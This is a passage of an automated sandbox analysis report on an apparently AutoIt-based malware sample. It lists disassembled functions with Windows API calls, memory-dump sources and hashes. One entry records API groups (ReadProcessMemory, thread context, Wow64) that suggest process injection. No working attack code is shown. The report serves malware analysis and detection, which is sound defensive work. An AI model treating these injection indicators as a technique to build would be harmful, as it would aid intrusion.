                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A89E5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                              • Instruction ID: 0335be98ff5b1c48bfa3eefbd4eea056476ee3eab34db08d2b7e1df31733fb94
                                                                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                              • Instruction Fuzzy Hash: 6A12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                                              Function 02F15F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55bb2e36a34a5ba19c7e266167272042c4028654939e2a51fb10b59079fe60c9
                                                                              • Instruction ID: 9fd9d2f24ed11de56bc8330837a623f0262b83586172de1d759c042bc2b07aaf
                                                                              • Opcode Fuzzy Hash: 55bb2e36a34a5ba19c7e266167272042c4028654939e2a51fb10b59079fe60c9
                                                                              • Instruction Fuzzy Hash: 04710932D0D3808FDB3687288454775BB69ABD2AE8FCD869AD795CB1E3D3718448C352
                                                                              Function 02F16490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b91dafc315f72cd247953dc075192c650664a9120a2413a466882fe386833eff
                                                                              • Instruction ID: 0a4fef46ed1f4f6af9b01cb9e5d258264f433814ec28732567319422848296d7
                                                                              • Opcode Fuzzy Hash: b91dafc315f72cd247953dc075192c650664a9120a2413a466882fe386833eff
                                                                              • Instruction Fuzzy Hash: 5731F971E0C3808EDB358B28C545335BBACAB91AD8FCD869EE395DA2A6D7758004C752
                                                                              Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                              Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                              • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                              • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                              • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                              Function 00407B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                              • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                                                              • Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                              • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                                                              Function 0040784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 57bd9c283acc5bcb2b2b360e3dd3e2e9694fe6d0d7b28f1284b8e0398af56708
                                                                              • Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
                                                                              • Opcode Fuzzy Hash: 57bd9c283acc5bcb2b2b360e3dd3e2e9694fe6d0d7b28f1284b8e0398af56708
                                                                              • Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799
                                                                              Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                              • String ID:
                                                                              • API String ID: 1396898556-0
                                                                              • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                              • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                              • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                              • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                              Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                              • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                              • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                              • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                              Function 02F16086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 1ac903cd863a45bfed65240f0d7a2170f2ea0836ae70640391046610bd2a2c0b
                                                                              • Instruction ID: 598b094a7a164d1fd3692138aa5b1c16898ad3a4b3ddb678967f9c0a45bf638a
                                                                              • Opcode Fuzzy Hash: 1ac903cd863a45bfed65240f0d7a2170f2ea0836ae70640391046610bd2a2c0b
                                                                              • Instruction Fuzzy Hash: 73017571D0D3409EDB258F2484143767BBCAF86AD4FC98A9AE785EB1A3D7708508CB52
                                                                              Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 004248A6
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                              • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                              • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                              • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                              Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                              • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                              • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                              • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                              Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath_memmove
                                                                              • String ID:
                                                                              • API String ID: 2514874351-0
                                                                              • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                              • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                              • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                              • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                              Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                              Function 00A8A5E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: d94ed726ba65e282908b1c447908cb50b6f29499798224db0e6c95149f9d7071
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: AFE0E67494010DDFDB00EFB4D54D69D7FB4EF14301F100161FD01D2280D6309D508A72

                                                                              Non-executed Functions

                                                                              Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                              • SendMessageW.USER32 ref: 0048CC29
                                                                              • _wcsncpy.LIBCMT ref: 0048CC95
                                                                              • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                              • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                              • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                              • SendMessageW.USER32 ref: 0048CD33
                                                                              • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                              • SetCapture.USER32(?), ref: 0048CE69
                                                                              • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                              • ReleaseCapture.USER32 ref: 0048CF00
                                                                              • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                              • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                              • SendMessageW.USER32 ref: 0048CFD1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                              • SendMessageW.USER32 ref: 0048D03D
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                              • GetCursorPos.USER32(?), ref: 0048D08D
                                                                              • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                              • GetParent.USER32(?), ref: 0048D0BA
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                              • SendMessageW.USER32 ref: 0048D154
                                                                              • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                              • SendMessageW.USER32 ref: 0048D22F
                                                                              • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F$pbL
                                                                              • API String ID: 3977979337-2097280626
                                                                              • Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                              • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                              • Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                              • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                              Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
